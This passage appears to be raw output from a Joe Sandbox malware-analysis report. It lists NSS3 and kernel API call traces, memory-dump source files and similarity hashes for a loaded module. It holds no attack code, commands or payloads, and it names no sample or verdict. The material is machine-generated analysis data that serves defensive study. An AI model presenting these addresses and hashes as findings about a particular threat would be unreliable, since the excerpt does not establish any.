                                                                                                                                                                                                                                                        • Part of subcall function 6C491A40: PR_Now.NSS3(?,00000000,6C4728AD,00000000,?,6C48F09A,00000000,6C4728AD,6C4793B0,?,6C4793B0,6C4728AD,00000000,?,00000000), ref: 6C491A65
                                                                                                                                                                                                                                                        • Part of subcall function 6C491940: CERT_DestroyCertificate.NSS3(00000000,00000000,?,6C494126,?), ref: 6C491966
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C47A1A3
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Arena_CriticalEnterFreeSectionUnlockUtilValue$CertificateDestroy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3953697463-0
                                                                                                                                                                                                                                                      • Opcode ID: 918f0944c2384415ff1c5f40b1ab6472882621b14a19de4f6a9bf468ce43d056
                                                                                                                                                                                                                                                      • Instruction ID: 99d2f08a55aad4e1a3ce0c93ec4870eb4311f1db612ed44352b16e53c84c6448
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 918f0944c2384415ff1c5f40b1ab6472882621b14a19de4f6a9bf468ce43d056
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB5106B5A013409BEB20DF69CC48EEB77B8EF86309B15442DDC2997B01EB31E945C6B1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000,6C4B1444,?,00000001,?,00000000,00000000,?,?,6C4B1444,?,?,00000000,?,?), ref: 6C4B0CB3
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C4B1444,?,00000001,?,00000000,00000000,?,?,6C4B1444,?), ref: 6C4B0DC1
                                                                                                                                                                                                                                                      • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C4B1444,?,00000001,?,00000000,00000000,?,?,6C4B1444,?), ref: 6C4B0DEC
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C472AF5,?,?,?,?,?,6C470A1B,00000000), ref: 6C4D0F1A
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0F10: malloc.MOZGLUE(00000001), ref: 6C4D0F30
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C4D0F42
                                                                                                                                                                                                                                                      • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C4B1444,?,00000001,?,00000000,00000000,?), ref: 6C4B0DFF
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C4B1444,?,00000001,?,00000000), ref: 6C4B0E16
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C4B1444,?,00000001,?,00000000,00000000,?), ref: 6C4B0E53
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3(?,?,?,?,6C4B1444,?,00000001,?,00000000,00000000,?,?,6C4B1444,?,?,00000000), ref: 6C4B0E65
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C4B1444,?,00000001,?,00000000,00000000,?), ref: 6C4B0E79
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C1560: TlsGetValue.KERNEL32(00000000,?,6C490844,?), ref: 6C4C157A
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C1560: EnterCriticalSection.KERNEL32(?,?,?,6C490844,?), ref: 6C4C158F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C1560: PR_Unlock.NSS3(?,?,?,?,6C490844,?), ref: 6C4C15B2
                                                                                                                                                                                                                                                        • Part of subcall function 6C48B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C491397,00000000,?,6C48CF93,5B5F5EC0,00000000,?,6C491397,?), ref: 6C48B1CB
                                                                                                                                                                                                                                                        • Part of subcall function 6C48B1A0: free.MOZGLUE(5B5F5EC0,?,6C48CF93,5B5F5EC0,00000000,?,6C491397,?), ref: 6C48B1D2
                                                                                                                                                                                                                                                        • Part of subcall function 6C4889E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C4888AE,-00000008), ref: 6C488A04
                                                                                                                                                                                                                                                        • Part of subcall function 6C4889E0: EnterCriticalSection.KERNEL32(?), ref: 6C488A15
                                                                                                                                                                                                                                                        • Part of subcall function 6C4889E0: memset.VCRUNTIME140(6C4888AE,00000000,00000132), ref: 6C488A27
                                                                                                                                                                                                                                                        • Part of subcall function 6C4889E0: PR_Unlock.NSS3(?), ref: 6C488A35
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • sqlite3_value_text.NSS3(?,?), ref: 6C466ED8
                                                                                                                                                                                                                                                      • sqlite3_value_text.NSS3(?,?), ref: 6C466EE5
                                                                                                                                                                                                                                                      • memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6C466FA8
                                                                                                                                                                                                                                                      • sqlite3_value_text.NSS3(00000000,?), ref: 6C466FDB
                                                                                                                                                                                                                                                      • sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6C466FF0
                                                                                                                                                                                                                                                      • sqlite3_value_blob.NSS3(?,?), ref: 6C467010
                                                                                                                                                                                                                                                      • sqlite3_value_blob.NSS3(?,?), ref: 6C46701D
                                                                                                                                                                                                                                                      • sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6C467052
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SECOID_FindOID_Util.NSS3(?,?,FFFFE005,?,6C4D7313), ref: 6C4D8FBB
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C478298,?,?,?,6C46FCE5,?), ref: 6C4D07BF
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C4D07E6
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D081B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D0825
                                                                                                                                                                                                                                                      • SECOID_FindOID_Util.NSS3(?,?,?,FFFFE005,?,6C4D7313), ref: 6C4D9012
                                                                                                                                                                                                                                                      • SECOID_FindOID_Util.NSS3(?,?,?,?,FFFFE005,?,6C4D7313), ref: 6C4D903C
                                                                                                                                                                                                                                                      • SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,FFFFE005,?,6C4D7313), ref: 6C4D909E
                                                                                                                                                                                                                                                      • PORT_ArenaGrow_Util.NSS3(?,?,?,00000001,?,?,?,?,?,?,FFFFE005,?,6C4D7313), ref: 6C4D90DB
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,FFFFE005,?,6C4D7313), ref: 6C4D90F1
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
  • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
• PR_SetError.NSS3(FFFFE005,00000000,?,?,?,FFFFE005,?,6C4D7313), ref: 6C4D906B
  • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
• PR_SetError.NSS3(FFFFE005,00000000,?,FFFFE005,?,6C4D7313), ref: 6C4D9128
Memory Dump Source
• Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
Similarity
• API ID: Util$Error$ArenaFindValue$HashLookupTable$Alloc_AllocateCompareConstCriticalEnterGrow_Item_SectionUnlock
• String ID:
• API String ID: 3590961175-0
• Opcode ID: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
• Instruction ID: afab832b605e15187ad5d9e4e1d774c4a4a844141734022c53b201dfc6784d51
• Opcode Fuzzy Hash: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
• Instruction Fuzzy Hash: DF518F71A002028BFB10EF6ADC64F2AB3F9AF54359F164129D915D7B61EB32F805CB91
APIs
  • Part of subcall function 6C488850: calloc.MOZGLUE(00000001,00000028,00000000,?,?,6C490715), ref: 6C488859
  • Part of subcall function 6C488850: PR_NewLock.NSS3 ref: 6C488874
  • Part of subcall function 6C488850: PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6C48888D
• PR_NewLock.NSS3 ref: 6C489CAD
  • Part of subcall function 6C5398D0: calloc.MOZGLUE(00000001,00000084,6C460936,00000001,?,6C46102C), ref: 6C5398E5
  • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607AD
  • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607CD
  • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607D6
  • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C3F204A), ref: 6C4607E4
  • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,6C3F204A), ref: 6C460864
  • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C460880
  • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,6C3F204A), ref: 6C4608CB
  • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608D7
  • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608FB
• TlsGetValue.KERNEL32 ref: 6C489CE8
• EnterCriticalSection.KERNEL32(?,?,6C48ECEC,6C492FCD,00000000,?,6C492FCD,?), ref: 6C489D01
• TlsGetValue.KERNEL32(?,?,?,6C48ECEC,6C492FCD,00000000,?,6C492FCD,?), ref: 6C489D38
• EnterCriticalSection.KERNEL32(?,?,6C48ECEC,6C492FCD,00000000,?,6C492FCD,?), ref: 6C489D4D
• PR_Unlock.NSS3 ref: 6C489D70
• PR_Unlock.NSS3 ref: 6C489DC3
• PR_NewLock.NSS3 ref: 6C489DDD
  • Part of subcall function 6C4888D0: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C490725,00000000,00000058), ref: 6C488906
  • Part of subcall function 6C4888D0: EnterCriticalSection.KERNEL32(?), ref: 6C48891A
  • Part of subcall function 6C4888D0: PL_ArenaAllocate.NSS3(?,?), ref: 6C48894A
  • Part of subcall function 6C4888D0: calloc.MOZGLUE(00000001,6C49072D,00000000,00000000,00000000,?,6C490725,00000000,00000058), ref: 6C488959
  • Part of subcall function 6C4888D0: memset.VCRUNTIME140(?,00000000,?), ref: 6C488993
  • Part of subcall function 6C4888D0: PR_Unlock.NSS3(?), ref: 6C4889AF
Memory Dump Source
• Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
Similarity
• API ID: Value$calloc$CriticalEnterLockSectionUnlock$Arena$AllocateInitPoolmemset
• String ID:
• API String ID: 3394263606-0
• Opcode ID: 51556b306c9cfb1592132b2c97adb98e2d672a3852492fd2c1e57750c2a9fa91
• Instruction ID: fbdaa9dc08f2a42e21db6212135c4e6454806ce17cf23ab395012322e5b06832
• Opcode Fuzzy Hash: 51556b306c9cfb1592132b2c97adb98e2d672a3852492fd2c1e57750c2a9fa91
• Instruction Fuzzy Hash: 85515EB0A06B058FDB00EF68C484E5ABBF0BF54359F15852DD8989BB10EB31E884CBD5
APIs
• EnterCriticalSection.KERNEL32(?), ref: 6C589EC0
• EnterCriticalSection.KERNEL32(?), ref: 6C589EF9
• _PR_MD_UNLOCK.NSS3(?), ref: 6C589F73
• EnterCriticalSection.KERNEL32(?), ref: 6C589FA5
• _PR_MD_NOTIFY_CV.NSS3(-00000074), ref: 6C589FCF
• _PR_MD_UNLOCK.NSS3(?), ref: 6C589FF2
• _PR_MD_UNLOCK.NSS3(?), ref: 6C58A01D
Memory Dump Source
• Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
Similarity
• API ID: CriticalEnterSection
• String ID:
• API String ID: 1904992153-0
• Opcode ID: 45b8d8a35fa4420bdea1defad4ac42646f9b35ffbf93b8fcce8d1b3ebcaaea86
• Instruction ID: 9387f445e063be9b56ddade04ef2548801ece252d37e5cc4fe75a0396a33995e
• Opcode Fuzzy Hash: 45b8d8a35fa4420bdea1defad4ac42646f9b35ffbf93b8fcce8d1b3ebcaaea86
• Instruction Fuzzy Hash: 00519EB2801621CBCB109F25DC8064AB7B4BF84319F15856AD8595BB52EB31FC89CBA1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_Now.NSS3 ref: 6C47DCFA
                                                                                                                                                                                                                                                        • Part of subcall function 6C539DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C580A27), ref: 6C539DC6
                                                                                                                                                                                                                                                        • Part of subcall function 6C539DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C580A27), ref: 6C539DD1
                                                                                                                                                                                                                                                        • Part of subcall function 6C539DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C539DED
                                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C47DD40
                                                                                                                                                                                                                                                      • CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6C47DD62
                                                                                                                                                                                                                                                      • CERT_DestroyCertificate.NSS3(?), ref: 6C47DD71
                                                                                                                                                                                                                                                      • CERT_DestroyCertificate.NSS3(00000000), ref: 6C47DD81
                                                                                                                                                                                                                                                      • CERT_RemoveCertListNode.NSS3(?), ref: 6C47DD8F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4906A0: TlsGetValue.KERNEL32 ref: 6C4906C2
                                                                                                                                                                                                                                                        • Part of subcall function 6C4906A0: EnterCriticalSection.KERNEL32(?), ref: 6C4906D6
                                                                                                                                                                                                                                                        • Part of subcall function 6C4906A0: PR_Unlock.NSS3 ref: 6C4906EB
                                                                                                                                                                                                                                                      • CERT_DestroyCertificate.NSS3(?), ref: 6C47DD9E
                                                                                                                                                                                                                                                      • CERT_DestroyCertificate.NSS3(?), ref: 6C47DDB7
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CertificateDestroy$Time$CertSystem$CriticalEnterFileFindIssuerListNodeRemoveSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strcmp
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 653623313-0
                                                                                                                                                                                                                                                      • Opcode ID: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
                                                                                                                                                                                                                                                      • Instruction ID: 951e07abbb6edc24c6003d1ad8f3015c9ea29b90f8e48e027300086499736b0c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 91218CB6E011259BEF21DEA4DD40DDEBBB4AF05219B190024E818A7701F722ED158BF2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C50AADB,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505F72
                                                                                                                                                                                                                                                        • Part of subcall function 6C46ED70: DeleteCriticalSection.KERNEL32(?), ref: 6C46ED8F
                                                                                                                                                                                                                                                        • Part of subcall function 6C46ED70: DeleteCriticalSection.KERNEL32(?), ref: 6C46ED9E
                                                                                                                                                                                                                                                        • Part of subcall function 6C46ED70: DeleteCriticalSection.KERNEL32(?), ref: 6C46EDA4
                                                                                                                                                                                                                                                      • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C50AADB,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505F8F
                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(00000001,00000000,00000000,?,6C50AADB,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505FCC
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,6C50AADB,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505FD3
                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(00000001,00000000,00000000,?,6C50AADB,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505FF4
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,6C50AADB,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505FFB
                                                                                                                                                                                                                                                      • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C50AADB,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C506019
                                                                                                                                                                                                                                                      • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C50AADB,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C506036
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalDeleteSection$DestroyMonitor$free
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 227462623-0
                                                                                                                                                                                                                                                      • Opcode ID: 7f83e505bea8e8846bbdb8aca8d1c25ac517a7064b6d84c380f03ce62049486f
                                                                                                                                                                                                                                                      • Instruction ID: 77c2f00d9a5bd523010c8d507d744ad8f6534092b70bc552a68148168edacf50
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7f83e505bea8e8846bbdb8aca8d1c25ac517a7064b6d84c380f03ce62049486f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 392127F1604B019BEA10DF75DC48BD777E8AB41748F10082CE46AC7640EB36F118CB91
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_LogFlush.NSS3(00000000,00000000,?,?,6C587AE2,?,?,?,?,?,?,6C58798A), ref: 6C58086C
                                                                                                                                                                                                                                                        • Part of subcall function 6C580930: EnterCriticalSection.KERNEL32(?,00000000,?,6C580C83), ref: 6C58094F
                                                                                                                                                                                                                                                        • Part of subcall function 6C580930: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,6C580C83), ref: 6C580974
                                                                                                                                                                                                                                                        • Part of subcall function 6C580930: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C580983
                                                                                                                                                                                                                                                        • Part of subcall function 6C580930: _PR_MD_UNLOCK.NSS3(?,?,6C580C83), ref: 6C58099F
                                                                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,00000000,?,?,6C587AE2,?,?,?,?,?,?,6C58798A), ref: 6C58087D
                                                                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,6C587AE2,?,?,?,?,?,?,6C58798A), ref: 6C580892
                                                                                                                                                                                                                                                      • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,6C58798A), ref: 6C5808AA
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,00000000,00000000,?,?,6C587AE2,?,?,?,?,?,?,6C58798A), ref: 6C5808C7
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,00000000,00000000,?,?,6C587AE2,?,?,?,?,?,?,6C58798A), ref: 6C5808E9
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,6C587AE2,?,?,?,?,?,?,6C58798A), ref: 6C5808EF
                                                                                                                                                                                                                                                      • PR_DestroyLock.NSS3(?,00000000,00000000,?,?,6C587AE2,?,?,?,?,?,?,6C58798A), ref: 6C58090E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: free$__acrt_iob_func$CriticalDestroyEnterFlushLockSectionfclosefflushfwrite
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3145526462-0
                                                                                                                                                                                                                                                      • Opcode ID: 369b97973a35bef26799b70b4e954bbfde27a7f3bc19dbf12e86c7441e9cb40d
                                                                                                                                                                                                                                                      • Instruction ID: df9ea1bc3f69ee230b87d0edceb9c08c6d1960b21ffcf948cfd7bf5c245d679b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 369b97973a35bef26799b70b4e954bbfde27a7f3bc19dbf12e86c7441e9cb40d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF1181B1B033504BFB00AB54DC5574B3778AB81368F1E0125E41547A40DB31F945CBDE
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,6C4E460B,?,?), ref: 6C473CA9
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C473CB9
